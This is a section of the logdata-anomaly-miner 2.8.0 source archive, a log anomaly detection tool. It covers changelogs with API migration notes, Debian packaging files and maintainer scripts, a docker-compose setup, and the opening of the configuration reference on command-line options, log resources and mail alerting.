Bugfixes: * AnalysisChild: handle remote control client connection errors correctly * Various bugfixes -- Markus Wurzenberger Tue, 2 Oct 2018 17:00:00 +0000 logdata-anomaly-miner (0.0.8) xenial; urgency=low Apart from bugfixes, new parsing and analysis components were added: * Base64StringModelElement * DecimalFloatValueModelElement * StringRegexMatchRule * EnhancedNewMatchPathValueComboDetector -- Roman Fiedler Tue, 30 May 2017 17:00:00 +0000 logdata-anomaly-miner (0.0.7) xenial; urgency=low The datetime parsing DateTimeModelElement was reimplemented to fix various shortcomings of strptime in Python and libc. This will require changes in configuration due to API changes, e.g.: -time_model=DateTimeModelElement('time', '%b %d %H:%M:%S', 15, False) +time_model=DateTimeModelElement('time', '%b %d %H:%M:%S') See /usr/lib/logdata-anomaly-miner/aminer/parsing/DateTimeModelElement.py source code documentation for currently supported datetime format options. The code for reading log input was improved to allow also input from UNIX sockets. Thus the configuration was changed to support those modes: -config_properties['LogFileList']=['/var/log/auth.log', ... +config_properties['LogResourceList'] = ['file:///var/log/auth.log', ... -- Roman Fiedler Mon, 9 Jan 2017 18:00:00 +0000 logdata-anomaly-miner (0.0.6) xenial; urgency=low The input IO-handling was redesigned, thus introducing following API changes. The changes are flaged with (D)eveloper and (U)ser to indicate if only developers of own AMiner addons are affected or also users may need to migrate their configuration. * Upper layers receive LogAtom objects instead of log lines, parsing data as separate parameters. Thus also separate paths for forwarding of parsed and unparsed atoms are not required any more. 
See below for details (D, U): * Update any own UnparsedAtomHandler/ParsedAtomHandlerInterface implementations to use new interface "input.AtomHandlerInterface" and access to additional information to new methods and fields (D): -from aminer.parsing import ParsedAtomHandlerInterface +from aminer.input import AtomHandlerInterface -class YourHandler(ParsedAtomHandlerInterface, ... +class YourHandler(AtomHandlerInterface, - def receiveParsedAtom(self, atom_data, parser_match): + def receive_atom(self, log_atom): - timestamp=parser_match.get_default_timestamp() + timestamp=log_atom.get_timestamp() + parser_match=log_atom.parser_match - print '%s' % atom_data + print '%s' % log_atom.rawData * With parsed/unparsed atom processing path convergence, naming of other classes does not make sense any more (U): -from aminer.analysis import VolatileLogarithmicBackoffParsedAtomHistory +from aminer.util import VolatileLogarithmicBackoffAtomHistory - from aminer.analysis import ParsedAtomFilters + from aminer.analysis import AtomFilters - match_action=Rules.ParsedAtomFilterMatchAction(... + match_action=Rules.AtomFilterMatchAction(... - parsed_atom_handlers=[] - unparsed_atom_handlers=[] - analysis_context.atomizer_factory=SimpleByteStreamLineAtomizerFactory( - parsing_model, parsed_atom_handlers, unparsed_atom_handlers, ... + atom_filter=AtomFilters.SubhandlerFilter(None) + analysis_context.atomizer_factory=SimpleByteStreamLineAtomizerFactory( + parsing_model, [atom_filter], ... For handling of unparsed atoms: - unparsed_atom_handlers.append(SimpleUnparsedAtomHandler(anomaly_event_handlers)) + atom_filter.add_handler(SimpleUnparsedAtomHandler(anomaly_event_handlers), + stop_when_handled_flag=True) For handling of parsed atoms: - parsed_atom_handlers.append(... + atom_filter.add_handler(... 
-- Roman Fiedler Fri, 4 Nov 2016 18:00:00 +0000 logdata-anomaly-miner (0.0.5) xenial; urgency=low Following API changes were introduced: * Lower input layers dealing with binary data stream reading, splitting into atoms and forwarding data to the parsing model were redesigned. Following configuration changes are required to adapt "config.py" and probably "analysis.py" to the new API: * analysis_context.register_component(): register_as_raw_atom_handler parameter not needed any more, can be removed. * SimpleParsingModelRawAtomHandler is not needed any more, that part can be replaced by configuration: # Now define the AtomizerFactory using the model. A simple line # based one is usually sufficient. from aminer.input import SimpleByteStreamLineAtomizerFactory analysis_context.atomizer_factory=SimpleByteStreamLineAtomizerFactory( parsing_model, parsed_atom_handlers, unparsed_atom_handlers, anomaly_event_handlers, default_timestamp_paths=['/model/syslog/time']) * SimpleUnparsedAtomHandler was moved from "aminer.events" to "aminer.input". -- Roman Fiedler Mon, 11 Oct 2016 18:00:00 +0000 logdata-anomaly-miner (0.0.4) xenial; urgency=low Following API changes were introduced: * Event handling (general): Change of EventHandlerInterface to include also event_source as last parameter. See /usr/lib/logdata-anomaly-miner/aminer/events/__init__.py * VolatileLogarithmicBackoffEventHistory: Added event ID and source to stored tuple to allow unique identification of events. Split result of "getHistory()" to include "eventId, eventType, event_message, sorted_log_lines, event_data, event_source". -- Roman Fiedler Fri, 26 Aug 2016 15:15:00 +0000 logdata-anomaly-miner (0.0.3) xenial; urgency=low Following API changes were introduced: * To improve readability of configuration files, main parser, analysis and event classes were added to the submodule namespaces. After imports directly from the submodule, e.g. 
"from aminer.parsing import FixedDataModelElement", the name duplication "FixedDataModelElement.FixedDataModelElement" is not required any more, "FixedDataModelElement" is sufficient. Use "sed -i -e 's/Name.Name/Name/g' [files]" to adapt. * Component timing was restructured to allow forensic/realtime triggering. Therefore also clean interface was added, which is now also used to reduce redundant code in component registration. Old way: analysis_context.register_component(new_match_path_detector, component_name=None, register_as_raw_atom_handler=False, register_as_time_triggered_handler=True) New way: analysis_context.register_component(new_match_path_detector, register_as_raw_atom_handler=False) For own custom time-triggered components, make sure to implement the "aminer.util.TimeTriggeredComponentInterface". Use any standard component, e.g. "/usr/lib/logdata-anomaly-miner/aminer/analysis/NewMatchPathDetector.py" as example. * Introduction of "AnalysisContext" to have common handle for all data required to perform the analysis. Therefore also the signature of "build_analysis_pipeline" in "config.py/analysis.py" has changed from def build_analysis_pipeline(aminer_config): to def build_analysis_pipeline(analysis_context): Old references to "aminer_config" within the configuration script have to be replaced by "analysis_context.aminer_config". 
-- Roman Fiedler Thu, 21 Jul 2016 19:00:00 +0000 logdata-anomaly-miner-2.8.0/debian/000077500000000000000000000000001500476301700171275ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/debian/changelog000066400000000000000000000131031500476301700207770ustar00rootroot00000000000000logdata-anomaly-miner (2.8.0-1) unstable; urgency=low [ Markus Wurzenberger ] * New upstream release V2.8.0, see https://github.com/ait-aecid/logdata-anomaly-miner/releases/tag/V2.8.0 logdata-anomaly-miner (2.7.0-1) unstable; urgency=low [ Markus Wurzenberger ] * New upstream release V2.7.0, see https://github.com/ait-aecid/logdata-anomaly-miner/releases/tag/V2.7.0 logdata-anomaly-miner (2.6.1-1) unstable; urgency=low [ Markus Wurzenberger ] * New upstream release V2.6.1, see https://github.com/ait-aecid/logdata-anomaly-miner/releases/tag/V2.6.1 logdata-anomaly-miner (2.6.0-1) unstable; urgency=low [ Markus Wurzenberger ] * New upstream release V2.6.0, see https://github.com/ait-aecid/logdata-anomaly-miner/releases/tag/V2.6.0 logdata-anomaly-miner (2.5.1-1) unstable; urgency=low [ Markus Wurzenberger ] * New upstream release V2.5.1, see https://github.com/ait-aecid/logdata-anomaly-miner/releases/tag/V2.5.1 logdata-anomaly-miner (2.5.0-1) unstable; urgency=low [ Markus Wurzenberger ] * New upstream release V2.5.0, see https://github.com/ait-aecid/logdata-anomaly-miner/releases/tag/V2.5.0 [ Sebastian Ramacher ] * debian/rules: Remove obsolete override * debian/control: Bump Standards-Version -- Markus Wurzenberger Mon, 06 Dec 2021 11:02:01 +0100 logdata-anomaly-miner (2.4.2-1) unstable; urgency=low * New upstream release V2.4.2, see https://github.com/ait-aecid/logdata-anomaly-miner/releases/tag/V2.4.2 -- Markus Wurzenberger Tue, 23 Nov 2021 12:00:00 +0000 logdata-anomaly-miner (2.4.1-1) unstable; urgency=low * New upstream release V2.4.1, see https://github.com/ait-aecid/logdata-anomaly-miner/releases/tag/V2.4.1 -- Markus Wurzenberger Fri, 23 Jul 2021 12:00:00 +0000 
logdata-anomaly-miner (2.4.0-1) unstable; urgency=low * New upstream release V2.4.0, see https://github.com/ait-aecid/logdata-anomaly-miner/releases/tag/V2.4.0 -- Markus Wurzenberger Fri, 04 Jun 2021 12:00:00 +0000 logdata-anomaly-miner (2.3.1-1) unstable; urgency=low * New upstream release V2.3.1, see https://github.com/ait-aecid/logdata-anomaly-miner/releases/tag/V2.3.1 -- Markus Wurzenberger Thu, 08 Apr 2021 12:00:00 +0000 logdata-anomaly-miner (2.3.0-1) unstable; urgency=low * New upstream release V2.3.0, see https://github.com/ait-aecid/logdata-anomaly-miner/releases/tag/V2.3.0 -- Markus Wurzenberger Mon, 29 Mar 2021 12:00:00 +0000 logdata-anomaly-miner (2.2.1-1) unstable; urgency=low [ Markus Wurzenberger ] * New upstream release V2.2.1, see https://github.com/ait-aecid/logdata-anomaly-miner/releases/tag/V2.2.1 [ Sebastian Ramacher ] * debian/patches: Removed, integrated upstream -- Markus Wurzenberger Mon, 25 Jan 2021 12:00:00 +0000 logdata-anomaly-miner (2.2.0-1) unstable; urgency=low [ Markus Wurzenberger ] * New upstream release V2.2.0 [ Sebastian Ramacher ] * debian/control: - Bump Standards-Version - Set RRR: no * debian/logdata-anomaly-miner.maintscript: Move conffiles to new location * debian/logdata-anomaly-miner.links: Add link for aminer-peristence.py * debian/patches: Add hashbang to aminer-peristence.py * debian/rules: - Simplify rules by using execute_before_dh_auto_build target - Remove executable bits of some Python modules -- Markus Wurzenberger Tue, 22 Dec 2020 12:20:17 +0100 logdata-anomaly-miner (2.0.1-1) unstable; urgency=low * New upstream release V2.0.1 * Bump debhelper compat to 13 * Switch to new upstream location on Github * Update description * Provide upstream metadata -- Markus Wurzenberger Tue, 30 Jun 2020 14:42:46 +0200 logdata-anomaly-miner (1.0.0-1) unstable; urgency=low * New upstream release V1.0.0, see https://launchpad.net/logdata-anomaly-miner/+milestone/v1.0.0 -- Markus Wurzenberger Tue, 2 Oct 2018 17:00:00 +0000 
logdata-anomaly-miner (0.0.8-1) unstable; urgency=low * New upstream release V0.0.8, see https://launchpad.net/logdata-anomaly-miner/+milestone/v0.0.8 -- Roman Fiedler Tue, 30 May 2017 17:00:00 +0000 logdata-anomaly-miner (0.0.7-1) unstable; urgency=low * New upstream release V0.0.7, see https://launchpad.net/logdata-anomaly-miner/+milestone/v0.0.7 -- Roman Fiedler Mon, 9 Jan 2017 18:00:00 +0000 logdata-anomaly-miner (0.0.6-1) unstable; urgency=low * New upstream release V0.0.6, see https://launchpad.net/logdata-anomaly-miner/+milestone/v0.0.6 -- Roman Fiedler Fri, 4 Nov 2016 18:00:00 +0000 logdata-anomaly-miner (0.0.5-1) unstable; urgency=low * New upstream release (Closes: #840447). -- Roman Fiedler Tue, 11 Oct 2016 18:00:00 +0000 logdata-anomaly-miner (0.0.3-2) unstable; urgency=low * Packaging fix: unowned directory after purge (Closes: #832347). -- Roman Fiedler Tue, 2 Aug 2016 15:15:00 +0000 logdata-anomaly-miner (0.0.3-1) unstable; urgency=low * New upstream release (Closes: #832058). 
-- Roman Fiedler Thu, 21 Jul 2016 19:00:00 +0000 logdata-anomaly-miner (0.0.2-1) unstable; urgency=low * Initial inclusion of logdata-anomaly-miner to Debian (Closes: #813096) -- Roman Fiedler Thu, 9 Jun 2016 12:00:00 +0000 logdata-anomaly-miner-2.8.0/debian/control000066400000000000000000000025501500476301700205340ustar00rootroot00000000000000Source: logdata-anomaly-miner Section: admin Priority: optional Maintainer: Markus Wurzenberger Build-Depends: debhelper-compat (= 13), dh-python, docbook-xsl, docbook-xml, python3, xsltproc Standards-Version: 4.6.0 Homepage: https://aecid.ait.ac.at/ Vcs-Git: https://github.com/ait-aecid/logdata-anomaly-miner.git Vcs-Browser: https://github.com/ait-aecid/logdata-anomaly-miner Rules-Requires-Root: no Package: logdata-anomaly-miner Architecture: all Depends: ${python3:Depends}, python3-tz, ${misc:Depends}, python3-cerberus, python3-pkg-resources, python3-setuptools Suggests: python3-scipy Description: tool for log analysis pipelines This tool allows one to analyze log data streams and detect violations or anomalies in it. It can be run from console, as daemon with e-mail alerting, or embedded as library into own programs. It was designed to run the analysis with limited resources and lowest possible permissions to make it suitable for production server use. Analysis methods include: . * log line parsing and filtering with extended syntax and options * detection of new data elements (IPs, user names, MAC addresses) * statistical anomalies in log line values and frequencies * correlation rules between log lines . The tool is suitable to operate as a sensor feeding a SIEM and distributing messages via message queues. 
logdata-anomaly-miner-2.8.0/debian/copyright000066400000000000000000000036041500476301700210650ustar00rootroot00000000000000Format: https://www.debian.org/doc/packaging-manuals/copyright-format/1.0/ Upstream-Name: logdata-anomaly-miner Source: https://github.com/ait-aecid/logdata-anomaly-miner.git Files: * Copyright: 2016-2018, Roman Fiedler 2018-2021, Markus Wurzenberger 2018-2021, Max Landauer 2019-2021, Wolfgang Hotwagner 2019-2021, Ernst Leierzopf 2020-2021, Georg Hoeld 2016-2021, AIT Austrian Institute of Technology GmbH License: GPL-3.0+ Files: debian/* Copyright: 2016-2018, Roman Fiedler 2018-2021, Markus Wurzenberger 2018-2021, Max Landauer 2019-2021, Wolfgang Hotwagner 2019-2021, Ernst Leierzopf 2020-2021, Georg Hoeld 2016-2021, AIT Austrian Institute of Technology GmbH License: GPL-3.0+ License: GPL-3.0+ This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. . This package is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. . You should have received a copy of the GNU General Public License along with this program. If not, see . . On Debian systems, the complete text of the GNU General Public License version 3 can be found in "/usr/share/common-licenses/GPL-3". 
logdata-anomaly-miner-2.8.0/debian/dirs000066400000000000000000000000171500476301700200110ustar00rootroot00000000000000var/lib/aminer logdata-anomaly-miner-2.8.0/debian/logdata-anomaly-miner.docs000066400000000000000000000000241500476301700241560ustar00rootroot00000000000000README.md changelog logdata-anomaly-miner-2.8.0/debian/logdata-anomaly-miner.install000066400000000000000000000000201500476301700246700ustar00rootroot00000000000000source/root/* / logdata-anomaly-miner-2.8.0/debian/logdata-anomaly-miner.links000066400000000000000000000003351500476301700243530ustar00rootroot00000000000000/usr/lib/logdata-anomaly-miner/aminer.py /usr/bin/aminer /usr/lib/logdata-anomaly-miner/aminerremotecontrol.py /usr/bin/aminerremotecontrol /usr/lib/logdata-anomaly-miner/aminer-persistence.py /usr/bin/aminer-persistence logdata-anomaly-miner-2.8.0/debian/logdata-anomaly-miner.maintscript000066400000000000000000000003511500476301700255660ustar00rootroot00000000000000rm_conffile /etc/aminer/config.py.template 2.0.1-1~ rm_conffile /etc/init/aminer.conf 2.0.1-1~ mv_conffile /etc/aminer/conf-available/generic/EximParsingModel.py /etc/aminer/conf-available/generic/EximGenericParsingModel.py 2.2.0-1~ logdata-anomaly-miner-2.8.0/debian/logdata-anomaly-miner.manpages000066400000000000000000000000551500476301700250250ustar00rootroot00000000000000debian/aminer.1 debian/aminerremotecontrol.1 logdata-anomaly-miner-2.8.0/debian/postinst000077500000000000000000000023621500476301700207430ustar00rootroot00000000000000#!/bin/sh # postinst script for logdata-anomaly-miner # # see: dh_installdeb(1) set -e # summary of how this script can be called: # * `configure' # * `abort-upgrade' # * `abort-remove' `in-favour' # # * `abort-remove' # * `abort-deconfigure' `in-favour' # `removing' # # for details, see https://www.debian.org/doc/debian-policy/ or # the debian-policy package case "$1" in configure) analysisUser="aminer" analysisGroup="aminer" # Prohibit read access to configuration for other 
processes if ! dpkg-statoverride --list /etc/aminer > /dev/null; then chown "root.${analysisGroup}" -- /etc/aminer chmod 00750 -- /etc/aminer fi if ! dpkg-statoverride --list /var/lib/aminer > /dev/null; then chmod 00700 -- /var/lib/aminer chown "${analysisUser}.${analysisGroup}" -- /var/lib/aminer fi ;; esac # dh_installdeb will replace this with shell code automatically # generated by other debhelper scripts. #DEBHELPER# exit 0 logdata-anomaly-miner-2.8.0/debian/postrm000077500000000000000000000015171500476301700204050ustar00rootroot00000000000000#!/bin/sh # postrm script for logdata-anomaly-miner # # see: dh_installdeb(1) set -e # summary of how this script can be called: # * `remove' # * `purge' # * `upgrade' # * `failed-upgrade' # * `abort-install' # * `abort-install' # * `abort-upgrade' # * `disappear' # # for details, see https://www.debian.org/doc/debian-policy/ or # the debian-policy package case "$1" in remove) # Delete user, will also delete group. userdel "aminer" ;; esac # dh_installdeb will replace this with shell code automatically # generated by other debhelper scripts. #DEBHELPER# exit 0 logdata-anomaly-miner-2.8.0/debian/preinst000077500000000000000000000033201500476301700205370ustar00rootroot00000000000000#!/bin/sh # preinst script for logdata-anomaly-miner # # see: dh_installdeb(1) set -e # summary of how this script can be called: # * `install' # * `install' # * `upgrade' # * `abort-upgrade' # for details, see https://www.debian.org/doc/debian-policy/ or # the debian-policy package case "$1" in install) # Create the user to run the analysis service. analysisGroup="aminer" if [ "$(getent group "${analysisGroup}")" = "" ]; then # Add a separate group for aitmon. # The group does not need to be a system group, but low gid is # preferable to avoid mixing with user groups. Using '--system' # flag would cause gid allocation to go down from UID_MIN, not # up from SYS_GID_MIN, so avoid using --system. 
groupadd -K GID_MIN=100 -K GID_MAX=1000 "${analysisGroup}" fi analysisUser="aminer" if [ "$(getent passwd "${analysisUser}")" = "" ]; then # Add a system user, set home directory to nonexisting directory # to avoid loading of user-defined files. Create user without # using '--system' flag, thus allocating UIDs upwards. useradd -M --shell /usr/sbin/nologin --gid "${analysisGroup}" -K PASS_MAX_DAYS=-1 -K UID_MIN=100 -K UID_MAX=999 --home /nonexistent "${analysisUser}" # There is no way to make useradd ommit assignment of subuids, # so remove them immediately on affected systems. if test -e /etc/subuid; then usermod --del-subuids 1-4294967295 --del-subgids 1-4294967295 "${analysisUser}" fi fi ;; esac # dh_installdeb will replace this with shell code automatically # generated by other debhelper scripts. #DEBHELPER# exit 0 logdata-anomaly-miner-2.8.0/debian/rules000077500000000000000000000014731500476301700202140ustar00rootroot00000000000000#!/usr/bin/make -f # -*- makefile -*- # Uncomment this to turn on verbose mode. # export DH_VERBOSE=1 %: dh $@ --with=python3 execute_before_dh_auto_build: xsltproc --nonet \ --param make.year.ranges 1 \ --param make.single.year.ranges 1 \ --param man.charmap.use.subset 0 \ -o debian/ \ http://docbook.sourceforge.net/release/xsl/current/manpages/docbook.xsl \ docs/manpages/aminer.1.xml docs/manpages/aminerremotecontrol.1.xml # Modify startup behaviour in auto-generated code in postinst: # Do not attempt to add aminer.service to autostart if user does # not want to have it running explicitely. See "Running as a Service" # from /usr/share/doc/aminer/Readme.txt.gz for more information. 
override_dh_installsystemd: dh_installsystemd --no-enable override_dh_installchangelogs: dh_installchangelogs changelog logdata-anomaly-miner-2.8.0/debian/source/000077500000000000000000000000001500476301700204275ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/debian/source/format000066400000000000000000000000141500476301700216350ustar00rootroot000000000000003.0 (quilt) logdata-anomaly-miner-2.8.0/debian/upstream/000077500000000000000000000000001500476301700207675ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/debian/upstream/metadata000066400000000000000000000021501500476301700224700ustar00rootroot00000000000000Bug-Database: https://github.com/ait-aecid/logdata-anomaly-miner/issues Bug-Submit: https://github.com/ait-aecid/logdata-anomaly-miner/issues/new Changelog: https://github.com/ait-aecid/logdata-anomaly-miner/blob/main/changelog Documentation: https://github.com/ait-aecid/logdata-anomaly-miner/blob/main/README.md Other-References: https://aecid.ait.ac.at/further-information/ Reference: - Author: Markus Wurzenberger and Florian Skopik and Giuseppe Settanni and Roman Fiedler Booktitle: Proceedings of the 4th International Conference on Information Systems Security and Privacy DOI: 10.5220/0006643003860397 ISBN: 978-989-758-282-0 Pages: 386-397 Publisher: SciTePress Title: "AECID: A Self-learning Anomaly Detection Approach based on Light-weight Log Parser Models" Type: inproceedings URL: https://www.scitepress.org/Link.aspx?doi=10.5220/0006643003860397 Year: 2018 Repository: https://github.com/ait-aecid/logdata-anomaly-miner.git Repository-Browse: https://github.com/ait-aecid/logdata-anomaly-miner Security-Contact: https://github.com/ait-aecid/logdata-anomaly-miner/blob/main/SECURITY.md logdata-anomaly-miner-2.8.0/debian/watch000066400000000000000000000003041500476301700201550ustar00rootroot00000000000000version=4 opts="filenamemangle=s%(?:.*?)?V?(\d[\d.]*)\.tar\.gz%logdata-anomaly-miner-$1.tar.gz%" \ 
https://github.com/ait-aecid/logdata-anomaly-miner/tags \ (?:.*?/)?V?(\d[\d.]*)\.tar\.gz logdata-anomaly-miner-2.8.0/docker-compose.yml000066400000000000000000000015611500476301700213450ustar00rootroot00000000000000version: "3" services: redpanda: image: docker.vectorized.io/vectorized/redpanda:latest command: ['start --overprovisioned --smp 1 --memory 1G --reserve-memory 0M --node-id 0 --check=false'] ports: - "9092:9092" - "9644:9644" akafka: image: aitaecid/akafka:latest environment: KAFKA_TOPICS: '["aminer"]' KAFKA_BOOTSTRAP_SERVERS: redpanda volumes: - '$PWD/akafka:/var/lib/akafka' links: - redpanda depends_on: - redpanda aminer: build: context: . volumes: - '$PWD/akafka:/var/lib/akafka' - '$PWD/aminercfg:/etc/aminer' - '$PWD/persistency:/var/lib/aminer' - '$PWD/logs:/logs' depends_on: - akafka logdata-anomaly-miner-2.8.0/docs/000077500000000000000000000000001500476301700166355ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/docs/CONFIGURATION.rst000066400000000000000000003474351500476301700214160ustar00rootroot00000000000000.. _Overview: ======== Overview ======== The logdata-anomaly-miner can be configured in two different formats: **yaml** and **python**. The preferred format is yaml and the default configuration file for it is */etc/aminer/config.yaml*. The python format can be configured in */etc/aminer/config.py* and offers advanced possibilities to configure the logdata-anomaly-miner. However, this is only recommended for experts, as no errors are caught in the python configuration, which can make debugging very difficult. For both formats there are template configurations in */etc/aminer/template\_config.yaml* and */etc/aminer/template\_config.py*. The basic structure of the logdata-anomaly-miner is illustrated in the folloging diagram: .. 
image:: images/aminer-config-color.png :alt: Structure of the configuration-file: GENERAL, INPUT, PARSING, ANALYSING, EVENTHANDLING ----------------- Analysis Pipeline ----------------- The core component of the logdata-anomaly-miner is the "analysis pipeline". It consists of the parts INPUT, ANALYSIS and OUTPUT. .. image:: images/analysis-pipeline.png :alt: Parts of the analysis-pipeline ======================= Command-line Parameters ======================= ---------- -h, --help ---------- Show the help message and exit. ------------- -v, --version ------------- Show program's version number and exit. ------------------- -u, --check-updates ------------------- Check if updates for the aminer are available and exit. -------------------------- -c CONFIG, --config CONFIG -------------------------- * Default: /etc/aminer/config.yml Use the settings of the file CONFIG on startup. Two config-variants are allowed: python and yaml. .. seealso:: :ref:`Overview` ------------ -D, --daemon ------------ Run aminer as a daemon process. -------------------------- -s {0,1,2}, --stat {0,1,2} -------------------------- Set the stat level. Possible stat-levels are 0 for no statistics, 1 for normal statistic level and 2 for verbose statistics. --------------------------- -d {0,1,2}, --debug {0,1,2} --------------------------- Set the debug level. Possible debug-levels are 0 for no debugging, 1 for normal output (INFO and above), 2 for printing all debug information. -------------- --run-analysis -------------- Run aminer analysis-child. .. note:: This parameter is for internal use only. ----------- -C, --clear ----------- Remove all persistence directories and run aminer. -------------------------- -r REMOVE, --remove REMOVE -------------------------- Remove a specific persistence directory. REMOVE must be the name of the directory and must not contain '/' or '.'. Usually this directory can be found in '/var/lib/aminer'. 
----------------------------- -R RESTORE, --restore RESTORE ----------------------------- Restore a persistence backup. RESTORE must be the name of the directory and must not contain '/' or '.'. Usually this directory can be found in '/var/lib/aminer'. ---------------- -f, --from-begin ---------------- Removes repositioning data before starting the aminer so that all input files will be analyzed starting from the first line in the file rather than the last previously analyzed line. ------------------ -o, --offline-mode ------------------ Stop the aminer after all logs have been processed. .. note:: This parameter is useful for forensic analysis. --------------------------------------------- --config-properties KEY=VALUE [KEY=VALUE ...] --------------------------------------------- Set a number of config_properties by using key-value pairs (do not put spaces before or after the = sign). If a value contains spaces, you should define it with double quotes: 'foo="this is a sentence". Note that values are always treated as strings. If values are already defined in the config_properties, the input types are converted to the ones already existing. ======================= Configuration Reference ======================= --------------------- General Configuration --------------------- LearnMode ~~~~~~~~~ * Type: boolean (True,False) * Default: False This options turns the LearnMode on globally. .. warning:: This option can be overruled by the learn_mode that is configurable per analysis component. .. code-block:: yaml LearnMode: True AminerUser ~~~~~~~~~~ * Default: aminer This option defines the system-user that owns the aminer-process. .. code-block:: yaml AminerUser: 'aminer' AminerGroup ~~~~~~~~~~~ * Default: aminer This option defines the system-group that owns the aminer-process. .. code-block:: yaml AminerGroup: 'aminer' AnalysisConfigFile ~~~~~~~~~~~~~~~~~~ * Default: None This (optional) configuration file contains the whole analysis child configuration (code). 
When missing those configuration parameters are also taken from the main config. .. warning:: This option is only available for python configs. It does not work for yaml configs. .. code-block:: python config_properties['AnalysisConfigFile'] = 'analysis.py' RemoteControlSocket ~~~~~~~~~~~~~~~~~~~ This option controls where the unix-domain-socket for the RemoteControl should be created. The socket will not be created if this option is not set. .. code-block:: yaml RemoteControlSocket: '/var/lib/aminer/remcontrol.sock' SuppressNewMatchPathDetector ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ * Default: False * Type: boolean (True,False) Disable the output of the NewMatchPathDetector which detects new paths for logtypes. .. code-block:: yaml SuppressNewMatchPathDetector: False LogResourceList ~~~~~~~~~~~~~~~ * Required: **True** * Resource-Types: ``file://``, ``unix://`` Define the list of log resources to read from: the resources named here do not need to exist when aminer is started. This will just result in a warning. However if they exist, they have to be readable by the aminer process! Every resource needs to define the ``url`` with the resource-type. Optionally every resource can define ``json`` parameter (boolean) to define if the resource input data is json and ``parser_id`` to define the parser which should process the log data from this resource. By default the ``json_format`` parameter in the ``input`` section is used to determine if the input data is json or not. Supported types are: * file://[path]: Read data from file, reopen it after rollover * unix://[path]: Open the path as UNIX local socket for reading .. 
code-block:: yaml LogResourceList: - url: 'file:///var/log/apache2/access.log' - url: 'file:///home/ubuntu/data/mail.cup.com-train/daemon.log' json: True parser_id: 'syslog_parser' - url: 'file:///home/ubuntu/data/mail.cup.com-train/auth.log' - url: 'file:///home/ubuntu/data/mail.cup.com-train/suricata/eve.json' - url: 'file:///home/ubuntu/data/mail.cup.com-train/suricata/fast.log' json: True parser_id: 'suricata_fastlog' Core.PersistenceDir ~~~~~~~~~~~~~~~~~~~ * Default: /var/lib/aminer Read and store information to be used between multiple executions of aminer in this directory. The directory must only be accessible to the 'AminerUser' but not group/world readable. On violation, aminer will refuse to start. .. code-block:: yaml Core.PersistenceDir: '/var/lib/aminer' Core.PersistencePeriod ~~~~~~~~~~~~~~~~~~~~~~ * Type: Number of seconds * Default: 600 This options controls whether the logdata-anomaly-miner should write its persistency to disk. .. code-block:: yaml Core.PersistencePeriod: 600 Core.LogDir ~~~~~~~~~~~ * Default: /var/lib/aminer/log Directory for logfiles. This directory must be writeable to the 'AminerUser'. .. code-block:: yaml Core.LogDir: '/var/lib/aminer/log' MailAlerting.TargetAddress ~~~~~~~~~~~~~~~~~~~~~~~~~~ * Default: disabled Define a target e-mail address to send alerts to. When undefined, no e-mail notification hooks are added. .. code-block:: yaml MailAlerting.TargetAddress: 'root@localhost' MailAlerting.FromAddress ~~~~~~~~~~~~~~~~~~~~~~~~ Sender address of e-mail alerts. When undefined, "sendmail" implementation on host will decide, which sender address should be used. .. code-block:: yaml MailAlerting.FromAddress: 'root@localhost' MailAlerting.SubjectPrefix ~~~~~~~~~~~~~~~~~~~~~~~~~~ * Default: "aminer Alerts" Define, which text should be prepended to the standard aminer subject. .. 
code-block:: yaml MailAlerting.SubjectPrefix: 'aminer Alerts:' MailAlerting.AlertGraceTime ~~~~~~~~~~~~~~~~~~~~~~~~~~~ * Type: Number of seconds * Default: 0 (any event can immediately trigger alerting) Define a grace time after startup before aminer will react to an event and send the first alert e-mail. .. code-block:: yaml MailAlerting.AlertGraceTime: 0 MailAlerting.EventCollectTime ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ * Type: Number of seconds * Default: 10 Define how many seconds to wait after a first event triggered the alerting procedure before really sending out the e-mail. In that timespan, events are collected and will be sent all using a single e-mail. .. code-block:: yaml MailAlerting.EventCollectTime: 10 MailAlerting.MinAlertGap ~~~~~~~~~~~~~~~~~~~~~~~~ * Type: Number of seconds * Default: 600 Define the minimum time between two alert e-mails in seconds to avoid spamming. All events during this timespan are collected and sent out with the next report. .. code-block:: yaml MailAlerting.MinAlertGap: 600 MailAlerting.MaxAlertGap ~~~~~~~~~~~~~~~~~~~~~~~~ * Type: Number of seconds * Default: 600 Define the maximum time between two alert e-mails in seconds. When undefined this defaults to "MailAlerting.MinAlertGap". Otherwise this will activate an exponential backoff to reduce messages during permanent error states by increasing the alert gap by 50% when more alert-worthy events were recorded while the previous gap time was not yet elapsed. .. code-block:: yaml MailAlerting.MaxAlertGap: 600 MailAlerting.MaxEventsPerMessage ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ * Type: Number of events * Default: 1000 Define how many events should be included in one alert mail at most. .. code-block:: yaml MailAlerting.MaxEventsPerMessage: 1000 LogPrefix ~~~~~~~~~ This option defines the prefix for the output of each anomaly. .. code-block:: yaml LogPrefix: '' Log.Encoding ~~~~~~~~~~~~ * Type: string * Default: 'utf-8' This option defines the encoding of the logfiles. .. 
